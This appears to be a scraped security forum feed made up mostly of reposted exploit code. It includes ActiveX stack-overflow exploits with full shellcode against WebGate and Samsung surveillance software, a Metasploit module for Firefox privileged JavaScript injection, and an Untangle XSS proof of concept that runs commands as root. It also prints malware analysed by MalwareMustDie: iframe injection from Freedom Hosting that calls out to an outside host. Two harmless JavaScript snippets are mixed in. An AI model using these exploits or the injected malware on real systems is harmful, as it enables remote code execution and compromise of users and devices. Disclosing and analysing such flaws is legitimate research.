<html> <!-- Author: Praveen Darshanam Security Unplugged !!! Security Unplugged !!! # Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day) # Date: 27th March, 2015 # Vendor Homepage: WEBGATE | HD-CCTV solution provider # Software Link: Software | HD DVR, HD camera, SD DVR, IP camera, storage, management software - WEBGATE # Version: Control Center 4.8.7 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2099 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'> </object> <script> var buff1 = ""; var arg2=1; var arg3=1; var arg4=1; var nops = ""; var buff2 = ""; for (i=0;i<24; i++) { buff1 += "B"; } // jump over seh to shellcode nseh = "\xeb\x08PD"; // pop pop ret var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } //calc.exe payload sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4); </script> </html> Source: http://www.exploit-db.com/exploits/36518/
-
<html> <!-- Author: Praveen Darshanam Security Unplugged !!! Security Unplugged !!! # Exploit Title: WebGate eDVR Manager SiteName Stack Overflow SEH Overwrite (0Day) # Date: 27th March, 2015 # Vendor Homepage: WEBGATE | HD-CCTV solution provider # Software Link: :: Download Center :: # Version: eDVR Manager 2.6.4 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2098 WebGate eDVR Manager WESPPlayback.WESPPlaybackCtrl.1 SiteName Property Stack Buffer Overflow Remote Code Execution Vulnerability targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Property Let SiteName ( ByVal SiteSerialNumber As String ) As String" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='sname'> </object> <script> var buff1= ""; var buff2= "PraveenD"; var nops = ""; for (i=0; i<128; i++) { buff1 += "B"; } var nseh = "\xeb\x08PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } //calc.exe payload sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(8000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; sname.SiteName(fbuff) = buff2; </script> </html> Source: WebGate eDVR Manager 2.6.4 SiteName Stack Overflow
-
<html> <!-- # Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day) # Date: 26th MArch, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: 1, 6, 42, 0 # Tested on: Windows XP SP3 (IE6/7/8) # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll" prototype = "Sub LoadImage ( ByVal bstrFullPath As String )" memberName = "LoadImage" progid = "WESPMONITORLib.WESPMonitorCtrl" argCount = 1 For full analysis of the exploit refer http://blog.disects.com/2015/03/webgate-edvr-manager.html --> <object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'> </object> <script> var arg1 = ""; nops = ""; var buff = ""; for(i=0;i<268;i++) { arg1 += "B"; } nseh = "\xeb\x10\x90\x90"; //jmp over addr seh = "\x71\x47\x01\x10"; //pop pop ret addr document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>"); for(i=0;i<200;i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++) { buff += "A"; } // [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode] fbuff = arg1 + nseh + seh + nops + sc + buff; target.LoadImage(fbuff); </script> </html> Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' # discovery and metasploit module ], 'DisclosureDate' => "Jan 20 2014", 'References' => [ ['CVE', '2014-8636'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ] ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin js = js_obfuscate %Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; var props = {}; props.has = function(n){ if (!window.top.x && n=='nodeType') { window.top.x=window.open("chrome://browser/content/browser.xul", "x", "chrome,,top=-9999px,left=-9999px,height=100px,width=100px"); if (window.top.x) { Object.setPrototypeOf(document, pro); setTimeout(function(){ x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ x.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ x.close(); }, 100) }, 100) }, 100); } } } var pro = Object.getPrototypeOf(document); Object.setPrototypeOf(document, Proxy.create(props)); | %Q| <!doctype html> <html> <body> <script> #{js} </script> #{datastore['CONTENT'] || default_html} </body> </html> | end end Source
-
Multiple issues have been discovered in the Untangle NGFW virtual appliance. The vendor was unresponsive and uncooperative to the researcher. - Persistent XSS leading to root Authentication requiredConfirmed in versions 9 and 11 (up to rev r39357) Throughout the Untangle user interface there are editable data tables for various user configuration options. An example of this is in: Configuration > Networking > Port Forwards. This table can be edited by clicking add to create a new port forward rule, or directly edited by double-clicking on the table rows themselves. The problem arises from malicious user input into some of the fields of these editable tables, which is not properly sanitised and allows for execution of user supplied Javascript code in the context of the users browser. Because this configuration data is saved into the backend database, this allows for Persistent XSS in each of the vulnerable fields/tables. This XSS attack is particularly devastating due to the fact that the malicious attacker can run commands as root on the virtual appliance, allowing for total system takeover. This is because the Untangle JSON-RPC API has access to functionality provided by the ExecManager class (https://gitorious.org/untangle/src/source/381ad9cb2d1d475bb43814b07bbb0df2d1ae7b58:uvm/api/com/untangle/uvm/ExecManager.java), which by default allows for arbitrary commands to be run as root on the system. A POC demonstrating the issue is below: Insert the following into the srcdoc attribute of a user-controlled iframe in the Description field or another vulnerable field (can also be styled to hide etc): Test <iframe srcdoc='[insert code]'></iframe> (single quotes) Insert: <html><head> <script type="text/javascript" src="/ext4/ext-all-debug.js"></script> <script type="text/javascript" src="/jsonrpc/jsonrpc.js"></script> <script type="text/javascript" src="/script/i18n.js"></script> <script type="text/javascript" src="script/components.js"></script> <script type="text/javascript" src="script/main.js"></script></head><body onload="exec()"><script type="text/javascript"> function exec() { var rpc = {}; rpc.jsonrpc = new JSONRpcClient("/webui/JSON-RPC"); var serverUID = rpc.jsonrpc.UvmContext.getServerUID(); alert(serverUID); rpc.execManager = rpc.jsonrpc.UvmContext.execManager(); var cmd = "whoami > /tmp/who"; var exit = rpc.execManager.execResult(cmd); alert("Command: " + cmd + " - Exit code: " + exit); }</script></body></html> - Information disclosure from Local Directory Authentication requiredConfirmed in versions 9 and 11, not fixed. The Local Directory interface shows a list of users stored on the Untangle system. Unfortunately, passwords are not sufficiently encrypted to prevent information disclosure. Each user in the local directory interface has an attribute, 'passwordBase64Hash', which is the base64 encoded string of the plaintext password. Because base64 is a bi-directional encoding scheme, the passwordBase64Hash attribute can be trivially decoded into the original plaintext string, revealing the password for each user. CH Source
-
- configuration
- untangle
-
(and 3 more)
Tagged with:
-
<!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] --> Source
-
Un mic script in js pentru a te avertiza dupa o anumita perioada de timp predefinita de utilizator. // Alarm Clock Mai jos aveti codul sursa care il puteti copia in consola din chrome. // (Ctrl-Shift-C) (function() { (function() { var tim_def = prompt("Timp pana la declansarea alarmei?"); if (tim_def.length === 1) { var tim = tim_def; } else if (tim_def.length > 1) { var tim = tim_def.slice(0,-1); } else { alert ('Raspunsul nu este valid incearca din nou!') } var lctim = tim_def.slice(-1); var audio = new Audio('http://soundjax.com/reddo/97744%5EALARM.mp3'); var alerta = function(smo) { var mes = prompt("Ce ai vrea sa spun alerta ta?", "Alert!"); if (tim_def !== null) { setTimeout(function() { audio.play(); alert(mes ? mes : 'Alarma!'); }, 1000 * smo * parseFloat(tim)); } }; switch (lctim) { case 's': //secunde alerta(1); break; case 'm': //minute alerta(60); break; case 'o': //ore alerta(3600); break; default: alerta(60); break; } })(); })(); In plus puteti face un bookmark cu codul de mai jos: javascript:!function(){!function(){var a=prompt("Timp pana la declansarea alarmei?");if(1===a.length)var e=a;else if(a.length>1)var e=a.slice(0,-1);else alert("Raspunsul nu este valid incearca din nou!");var l=a.slice(-1),n=new Audio("http://soundjax.com/reddo/97744%5EALARM.mp3"),r=function(l){var r=prompt("Ce ai vrea sa spun alerta ta?","Alert!");null!==a&&setTimeout(function(){n.play(),alert(r?r:"Alarma!")},1e3*l*parseFloat(e))};switch(l){case"s":r(1);break;case"m":r(60);break;case"o":r(3600);break;default:r(60)}}()}();
-
- alarm in js
- break;
-
(and 3 more)
Tagged with:
-
<html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = ""; var buf2 = ""; //offset to SE is 156, initial analysis using metasploit cyclic pattern for (i=0; i<156; i++) { buf1 += "A"; } var nseh = "DD"; var seh = "\x87\x10"; //from Vulnerable DLL junk = buf1 + nseh + seh; //remaining buffer for (j=0; j<(payload_length-junk.length); j++) { buf2 += "B"; } //final malicious buffer var fbuff = junk + buf2; target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff); </script> </html> Source
-
Scris de dimineata la cafea: <script> function citeste(file) { fisier=new FileReader() fisier.onload = function(e) { var text = fisier.result; document.getElementById('display').innerHTML=text; } fisier.readAsText(file,'UTF-8') } </script> <input type="file" id="fileInput"> <input type='button' value='Citeste' onclick='citeste(fileInput.files[0])'></br> <textarea id='display' style='height:80%; width: 30%;'> </textarea>
-
- 2
-
- filereader
- fisier.onload
-
(and 3 more)
Tagged with:
-
# MalwareMustDie! # This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV # MalwareMustDie!# This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV // Case 1 function createCookie(name,value,minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime()+(minutes*60*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"; iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function format_quick() { if ( ! readCookie("n_serv") ) { createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30); updatify(); } } function isReady() { if ( document.readyState === "interactive" || document.readyState === "complete" ) { if ( isFF() ) { format_quick(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Case 2 function createCookie(name, value, minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime() + (minutes * 60 * 1000)); var expires = "; expires=" + date.toGMTString(); } else var expires = ""; document.cookie = name + "=" + value + expires + "; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function freedomhost() { if (!readCookie("n_serv")) { createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30); updatify(); } } function isReady() { if (document.readyState === "interactive" || document.readyState === "complete") { if (isFF()) { //window.alert(window.location + "Firefox Detected.") freedomhost(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Noted, same method, // second script is w/IP info callback, contacting remote host as per marked (1) IP Address: 65.222.202.53 City: Triadelphia State or Region: West Virginia Country: United States ISP: Verizon Business Latitude & Longitude: 40.0900-80.6220 Domain: verizonbusiness.com ZIP Code: 26059 --- #MalwareMustDie! @unixfreaxjp Source